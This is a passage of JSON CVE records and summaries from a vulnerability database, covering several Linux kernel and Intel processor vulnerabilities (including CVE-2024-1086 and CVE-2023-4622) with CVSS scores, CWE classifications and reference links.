"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=bb5ed01cd2428cd25b1c88a3a9cba87055eb289f"
},
{
"tags": [
"x_transferred"
],
"url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.5.3"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20231110-0001/"
},
{
"name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in drivers/net/ethernet/intel/igb/igb_main.c in the IGB driver in the Linux kernel before 6.5.3. A buffer size may not be adequate for frames larger than the MTU."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-11T19:07:05.019133",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=bb5ed01cd2428cd25b1c88a3a9cba87055eb289f"
},
{
"url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.5.3"
},
{
"url": "https://security.netapp.com/advisory/ntap-20231110-0001/"
},
{
"name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-45871",
"datePublished": "2023-10-15T00:00:00",
"dateReserved": "2023-10-15T00:00:00",
"dateUpdated": "2024-08-02T20:29:32.566Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-2166 (GCVE-0-2023-2166)
Vulnerability from cvelistv5
Published
2023-04-19 00:00
Modified
2025-02-05 15:13
Severity ?
VLAI Severity ?
EPSS score ?
CWE
Summary
A null pointer dereference issue was found in can protocol in net/can/af_can.c in the Linux before Linux. ml_priv may not be initialized in the receive path of CAN frames. A local user could use this flaw to crash the system or potentially cause a denial of service.
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T06:12:20.539Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://lore.kernel.org/lkml/CAO4mrfcV_07hbj8NUuZrA8FH-kaRsrFy-2metecpTuE5kKHn5w%40mail.gmail.com/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-2166",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-05T15:12:07.422598Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-05T15:13:09.129Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Linux",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "Linux Kernel version prior to Kernel 6.1 RC9"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A null pointer dereference issue was found in can protocol in net/can/af_can.c in the Linux before Linux. ml_priv may not be initialized in the receive path of CAN frames. A local user could use this flaw to crash the system or potentially cause a denial of service."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-04-19T00:00:00.000Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"url": "https://lore.kernel.org/lkml/CAO4mrfcV_07hbj8NUuZrA8FH-kaRsrFy-2metecpTuE5kKHn5w%40mail.gmail.com/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-2166",
"datePublished": "2023-04-19T00:00:00.000Z",
"dateReserved": "2023-04-18T00:00:00.000Z",
"dateUpdated": "2025-02-05T15:13:09.129Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-1086 (GCVE-0-2024-1086)
Vulnerability from cvelistv5
Published
2024-01-31 12:14
Modified
2025-07-30 01:37
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.
The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.
We recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.
References
| URL | Tags | |||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:3.15:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.8",
"status": "affected",
"version": "3.15",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-1086",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-13T14:20:47.271139Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2024-05-30",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-1086"
},
"type": "kev"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-30T01:37:08.023Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"timeline": [
{
"lang": "en",
"time": "2024-05-30T00:00:00+00:00",
"value": "CVE-2024-1086 added to CISA KEV"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T18:26:30.467Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660"
},
{
"tags": [
"x_transferred"
],
"url": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/Notselwyn/CVE-2024-1086"
},
{
"tags": [
"x_transferred"
],
"url": "https://news.ycombinator.com/item?id=39828424"
},
{
"tags": [
"x_transferred"
],
"url": "https://pwning.tech/nftables/"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/15/2"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/10/23"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/10/22"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/14/1"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2024/04/17/5"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20240614-0009/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Kernel",
"repo": "https://git.kernel.org",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.8",
"status": "affected",
"version": "3.15",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Notselwyn"
}
],
"datePublic": "2024-01-24T19:02:39.000Z",
"descriptions": [
{
"lang": "en",
"value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.\n\nWe recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660."
}
],
"impacts": [
{
"capecId": "CAPEC-233",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-233 Privilege Escalation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T12:10:45.558Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"tags": [
"patch"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660"
},
{
"url": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/"
},
{
"url": "https://github.com/Notselwyn/CVE-2024-1086"
},
{
"url": "https://news.ycombinator.com/item?id=39828424"
},
{
"url": "https://pwning.tech/nftables/"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/04/15/2"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/04/10/23"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/04/10/22"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/04/14/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/04/17/5"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240614-0009/"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2024-1086",
"datePublished": "2024-01-31T12:14:34.073Z",
"dateReserved": "2024-01-30T20:04:09.704Z",
"dateUpdated": "2025-07-30T01:37:08.023Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-40982 (GCVE-0-2022-40982)
Vulnerability from cvelistv5
Published
2023-08-11 02:37
Modified
2025-02-13 16:33
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- information disclosure
- CWE-1342 - Information exposure through microarchitectural state after transient execution
Summary
Information exposure through microarchitectural state after transient execution in certain vector execution units for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
References
| URL | Tags | |||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| n/a | Intel(R) Processors |
Version: See references |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T12:28:42.939Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://xenbits.xen.org/xsa/advisory-435.html"
},
{
"name": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00828.html",
"tags": [
"x_transferred"
],
"url": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00828.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://downfall.page"
},
{
"tags": [
"x_transferred"
],
"url": "https://aws.amazon.com/security/security-bulletins/AWS-2023-007/"
},
{
"tags": [
"x_transferred"
],
"url": "https://access.redhat.com/solutions/7027704"
},
{
"tags": [
"x_transferred"
],
"url": "https://xenbits.xen.org/xsa/advisory-435.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00013.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230811-0001/"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5474"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5475"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T7WO5JM74YJSYAE5RBV4DC6A4YLEKWLF/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OL7WI2TJCWSZIQP2RIOLWHOKLM25M44J/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HKREYYTWUY7ZDNIB2N6H5BUJ3LE5VZPE/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00026.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HKKYIK2EASDNUV4I7EFJKNBVO3KCKGRR/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-40982",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-31T20:33:43.011314Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-31T20:43:52.375Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Intel(R) Processors",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "See references"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Information exposure through microarchitectural state after transient execution in certain vector execution units for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "information disclosure",
"lang": "en"
},
{
"cweId": "CWE-1342",
"description": "Information exposure through microarchitectural state after transient execution",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-08-27T02:06:52.425Z",
"orgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce",
"shortName": "intel"
},
"references": [
{
"name": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00828.html",
"url": "http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00828.html"
},
{
"url": "https://downfall.page"
},
{
"url": "https://aws.amazon.com/security/security-bulletins/AWS-2023-007/"
},
{
"url": "https://access.redhat.com/solutions/7027704"
},
{
"url": "https://xenbits.xen.org/xsa/advisory-435.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00013.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230811-0001/"
},
{
"url": "https://www.debian.org/security/2023/dsa-5474"
},
{
"url": "https://www.debian.org/security/2023/dsa-5475"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T7WO5JM74YJSYAE5RBV4DC6A4YLEKWLF/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OL7WI2TJCWSZIQP2RIOLWHOKLM25M44J/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HKREYYTWUY7ZDNIB2N6H5BUJ3LE5VZPE/"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00026.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HKKYIK2EASDNUV4I7EFJKNBVO3KCKGRR/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce",
"assignerShortName": "intel",
"cveId": "CVE-2022-40982",
"datePublished": "2023-08-11T02:37:05.423Z",
"dateReserved": "2022-09-27T00:28:29.203Z",
"dateUpdated": "2025-02-13T16:33:03.126Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-4622 (GCVE-0-2023-4622)
Vulnerability from cvelistv5
Published
2023-09-06 13:56
Modified
2025-02-13 17:14
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A use-after-free vulnerability in the Linux kernel's af_unix component can be exploited to achieve local privilege escalation.
The unix_stream_sendpage() function tries to add data to the last skb in the peer's recv queue without locking the queue. Thus there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free.
We recommend upgrading past commit 790c2f9d15b594350ae9bca7b236f2b1859de02c.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T07:31:06.586Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-6.1.y\u0026id=790c2f9d15b594350ae9bca7b236f2b1859de02c"
},
{
"tags": [
"x_transferred"
],
"url": "https://kernel.dance/790c2f9d15b594350ae9bca7b236f2b1859de02c"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5492"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Kernel",
"repo": "https://git.kernel.org",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.1.47",
"status": "affected",
"version": "4.2",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Billy Jheng Bing-Jhong"
}
],
"datePublic": "2023-08-23T15:52:42.000Z",
"descriptions": [
{
"lang": "en",
"value": "A use-after-free vulnerability in the Linux kernel\u0027s af_unix component can be exploited to achieve local privilege escalation.\n\nThe unix_stream_sendpage() function tries to add data to the last skb in the peer\u0027s recv queue without locking the queue. Thus there is a race where unix_stream_sendpage() could access an skb locklessly that is being released by garbage collection, resulting in use-after-free.\n\nWe recommend upgrading past commit 790c2f9d15b594350ae9bca7b236f2b1859de02c."
}
],
"impacts": [
{
"capecId": "CAPEC-233",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-233 Privilege Escalation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-11T19:06:41.418Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"tags": [
"patch"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-6.1.y\u0026id=790c2f9d15b594350ae9bca7b236f2b1859de02c"
},
{
"url": "https://kernel.dance/790c2f9d15b594350ae9bca7b236f2b1859de02c"
},
{
"url": "https://www.debian.org/security/2023/dsa-5492"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
},
{
"url": "http://packetstormsecurity.com/files/175963/Kernel-Live-Patch-Security-Notice-LSN-0099-1.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Use-after-free in Linux kernel\u0027s af_unix component",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2023-4622",
"datePublished": "2023-09-06T13:56:56.355Z",
"dateReserved": "2023-08-30T11:57:48.389Z",
"dateUpdated": "2025-02-13T17:14:20.913Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-3545 (GCVE-0-2022-3545)
Vulnerability from cvelistv5
Published
2022-10-17 00:00
Modified
2025-04-15 13:43
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-119 - Memory Corruption -> CWE-416 Use After Free
Summary
A vulnerability has been found in Linux Kernel and classified as critical. Affected by this vulnerability is the function area_cache_get of the file drivers/net/ethernet/netronome/nfp/nfpcore/nfp_cppcore.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211045 was assigned to this vulnerability.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T01:14:01.597Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=02e1a114fdb71e59ee6770294166c30d437bf86a"
},
{
"tags": [
"x_transferred"
],
"url": "https://vuldb.com/?id.211045"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20221223-0003/"
},
{
"name": "DSA-5324",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5324"
},
{
"name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html"
},
{
"name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-3545",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-14T17:08:55.254158Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-04-15T13:43:19.382Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Kernel",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability has been found in Linux Kernel and classified as critical. Affected by this vulnerability is the function area_cache_get of the file drivers/net/ethernet/netronome/nfp/nfpcore/nfp_cppcore.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211045 was assigned to this vulnerability."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-119",
"description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-03T00:00:00.000Z",
"orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"shortName": "VulDB"
},
"references": [
{
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=02e1a114fdb71e59ee6770294166c30d437bf86a"
},
{
"url": "https://vuldb.com/?id.211045"
},
{
"url": "https://security.netapp.com/advisory/ntap-20221223-0003/"
},
{
"name": "DSA-5324",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5324"
},
{
"name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html"
},
{
"name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html"
}
],
"title": "Linux Kernel IPsec nfp_cppcore.c area_cache_get use after free",
"x_generator": "vuldb.com"
}
},
"cveMetadata": {
"assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
"assignerShortName": "VulDB",
"cveId": "CVE-2022-3545",
"datePublished": "2022-10-17T00:00:00.000Z",
"dateReserved": "2022-10-17T00:00:00.000Z",
"dateUpdated": "2025-04-15T13:43:19.382Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-4623 (GCVE-0-2023-4623)
Vulnerability from cvelistv5
Published
2023-09-06 13:56
Modified
2025-02-27 21:00
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A use-after-free vulnerability in the Linux kernel's net/sched: sch_hfsc (HFSC qdisc traffic control) component can be exploited to achieve local privilege escalation.
